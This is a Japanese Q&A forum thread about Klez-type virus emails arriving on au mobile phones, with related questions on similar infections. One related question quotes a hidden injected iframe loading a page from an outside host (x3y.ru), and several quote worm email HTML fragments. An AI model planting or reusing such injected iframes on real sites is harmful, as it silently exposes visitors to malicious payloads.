• 締切済み

AU携帯に入ったメールの事で・・・

友人ふたりから、こんなメールが携帯にきました。 題名:Visibility 内容はありません。 添付ファイル:ONLOAD.EXE その下に:<HTML><HEAD></HEAD><BODY>      iframe src=3DC1・・・ 添付ファイルは対応していないファイル形式で、開くことは出来ませんでした。 友人二人はともに送っていないそうです。 ウィルスのようなので、あわてて削除してしまいましたが、 その後調べてみて、「クレズ」のようだとわかりました。 メールを送られた私は、感染したのでしょうか。 また削除したことは、何か影響ありますか? 携帯にウィルスのワクチンはあるのですか? すみません、何も分からない状態ですので、よろしくお願いします。

  • efgon
  • お礼率100% (1/1)

みんなの回答

  • Raphael
  • ベストアンサー率21% (15/69)
回答No.1

携帯ならその様なファイルは実行できないので問題ないんじゃないですか? その友人のアドレスは携帯のアドレスですか? それともパソコンのアドレスですか?

efgon
質問者

お礼

昨日メール送信もとの友人から、 「ウィルス感染者が分かった。自分はファイルを開いてしまったので、パソコンを買った状態に 戻した」とメールが来ました。たぶん対処出来ていると思います。 私の方も大丈夫そうなので、一件落着ですね。ありがとうございました。

efgon
質問者

補足

問題ないと聞いて安心しました。 ありがとうございました。 友人の一人は携帯のアドレスで、もう一人はパソコンのアドレスでした。 その友人の所にも、私と共通の友人から同じ様なメールが届いていたそうです。 感染者が心配なのですが、5月6日の破壊が始まるまで、誰か分かる方法は無いのでしょうか?

関連するQ&A

  • ケータイへウィルスメール

    私の友だちからの相談ですが、下記のウイルスメールの件について、何か情報がありましたら教えて頂けますでしょうか。宜しくお願いします。 ・件名: language ・本文: <html><head></head><body>      <iframe src=3Dcid:E66T75 EyEEV35E heigt=3 Do width=300> 上記の内容のメールが知り合いより届き、添付ファイルがついているのでそれを開けてみると、自分の携帯にアドレス帳登録されている人宛に写真つきのメールが自動送信されてしまう、という現象がおこるウイルスメールのようです。 ケータイでもこういうのってあるんでしょうか…。

  • このメールの意味がわかりません。

    時々、このようなメールをもらいます。 受信してメールをクリックすると本文は表示されません。 (添付ファイルもついています。) メールサーバーでチェックをしているのですが、 ときどき見逃して受信してしまいます。 (nPOPQを使用) nPOPQでは下記のような本文でした。 <HTML><HEAD></head><BODY> <iframe src=cid:PI56cU727i1S5660i6 height=0 width=0> </iframe> <FONT></font></body></html> ウィルスとは思えないのですが。 宜しくお願いします。

  • ホームページのウイルス?スパム?について・・・

    ホームページを作成して約2年ほど公開しています。 ここ1ヵ月もたたないぐらいから作成したホームページを閲覧するとページの表示のされかたがおかしく、ページのトップがmargin-top200pxぐらい自動でかかっています。 しかもウイルスソフトにも引っかかります。 自分の記入ミスだと思い、確認したのですが、記述に間違いはなくページのtopにmargin-top200pxの記述はしていませんでした。 不気味に思ったので、サーバーにあがっているファイルを一時削除してもう一度アップしなおしました。 ところが数日後また同じ現象が起きていました。 毎回ウイルスソフトが「アクセスしたファイルは感染しています」と表示されます。 おかしいと思ったので、表示されているページのソースをブラウザ上からみたところ<html><head></head><body>のところに <iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe> という記述がありました。 これを調べたのですが、何も得られず、削除をしても数日後には復活しています。 また、必ずindex.htmlファイルが感染しているようです。 他のページ(member.html)などは感染していませんでした。 友達のPC(ウイルスバスター)でも引っかかると言っていました。 自分のはウイルスソフトはAVGを使用しています。 質問内容はまずどのようにしたら感染しているものを削除できるのでしょうか? また、<iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe>はなんでしょうか? ご教授お願いします。

  • 自分のアドレスからメールが来ました

    こんにちわ。すごく変なメールが来たので心配になり書き込みしています。 実は自分のメールアドレスが差出人のメールが届いたのです。 もちろん自分にメールするなんてことはありません。 内容は英語で書かれていて、簡単に言うと(英語はできないので大雑把な訳なんですが)、 今「クレズ/E」というウィルスが流行っています。 その対策としてワクチンを送付しました。 すぐに実行してみてください。 わからないことがありましたら、アドレスまで連絡ください。 というものでした。 もちろんアドレスというのは私のメールアドレスです。 悪戯かウィルスだろうと思い、添付ファイルは開かずに削除してしまったのですが こういうのってなんなのでしょうか? ちなみに私はimacを使用しており、 最新のウィルス対策ソフトも常駐させていて なんらかのウィルスに感染はしていないようでした。 これと同じメールが知人に届いていたらと思うと すごく怖いです。 なにかご存じの方がいらっしゃいましたら ご回答お願いします。

  • 携帯メールに来るウイルスメール

    知り合いがウイルスメールに感染したらしく、ウイルスメールが次々やって来ます。その人のアドレス帳には私の携帯メールアドレスが登録されていたので、携帯の方に来るのですが、携帯はなぜウイルスに感染しないのですか? 添付ファイルは重すぎて受信できていませんが、その人は添付ファイルを開いてないのに感染した、と言っています。 それとこのウイルスメールはいつまで続くのでしょう?その人が感染から脱したら(言葉が変かもしれませんが)来なくなるのでしょうか?

  • 携帯に英語のメールがくる。

    どうもです。 最近、携帯に英語のメールがよく届くようになりました。 送信元のアドレスも少し似ていて、何通もくるんです。 たまに、[添付ファイル削除]とか書いてるんでウイルスやと思うんですけど・・・。 拒否しても違うアドレスからきたりして。 一体なんなのでしょう? また、どうしたらこなくなりますか? 困っているので、教えて下さいm(__)m

  • auのメールなんですがウィルス感染しちゃったの?

    昨日急にauの携帯メールに知らないPCアドレスの方からメールが届きました。 「メールの内容を確認することができません。配信をとめてもらえませんか?よろしくお願いします。」という内容の本文の下にOriginal Messageとして私の携帯アドレスから送られてると思われるタイトル(The Garden of Edenという題)がついていました。 私の携帯からはその方宛の送信履歴は無くとっても不気味です。 その後同じ方から「直線上に」という題で添付ファイルつきのメールが送られてきました。 ファイルは2つで(1)src.bat (2)testimonial05.jpg というものでした。 それからまた今度も全く知らないPCアドレスから添付ファイルがとどきました。(rcQuery.bat) これってどういうことでしょう? もしかして携帯がウィルス感染してるのでしょうか?? 色んな知らない方に私の携帯からメールを送るのをとめることはできませんか?

  • 携帯に謎のメール

    先日携帯に知らないアドレスからメールが届き 添付ファイルも付いていました。 削除しようと思ったら間違えて開封してしまい それは意味不明な英文でした。 添付ファイルも開けなかったのですが そのまま削除しました。 携帯だからウィルスには感染しないだろうと 安易に考えていましたが 次の日から携帯に謎のアドレス添付ファイル付きの メールが一日に10回くらい届くようになり なんと・・・・・ 宛名が自分の名前のメールがあり ビックリしました。 自分の名前でメールが送られてきて 気持ち悪いです。 私はAUユーザーなのですが 同じAUユーザーの方で似たような経験ある方 いますか? またドコモやボーダフォンでも 同じような事ってありますか? 何か良い対策はありますか? できればアドレスは変えたくないのですが お願い致します。 使用機種はAUのA3015SAです。

  • 携帯でのメール受信について

    こちらの携帯はauのw43caです。 ヤフーメールから添付ファイル付メールを送信したところ携帯では正確に受信できました。 ですが、CGIメーラーから画像を添付し送信したところ携帯では削除となってしまいます。PCの方では画像も受信できます。 ちなみに携帯で画像が削除された時、添付ファイル削除というメッセージは出ません。 なぜ携帯に送信される時は画像が消えてしまうのでしょうか。 添付ファイル削除というコメントが出ないところも気にかかっています。 分かる方いましたらよろしくお願いします。

  • メールのプレビューについて

    環境はWIN95,Outlook express,internet explorer5.5 SP2です。 先日、クレズHが届き、ウィルスバスターで隔離成功となり、 添付ファイルの開くかどうかの画面でNOを選んび、削除し、 ウィルスチェックも問題なしなので大丈夫だとは思いますが、 ひとつ気になることがあります。 ウィルスメールは、「メールをプレビューするだけで感染する可能性がある」とのことですよね。 一応、自動的にプレビューはしないように、メーラーのチェックは変更してますが、画像で送られてきたjpgの添付ファイルは、メールを選ぶだけで、下に画像が表示されます。 これって、自動プレビューされてるということなのでしょうか? また、jpg画像でも表示しないようにって設定できるのでしょうか? 宜しくお願い致します。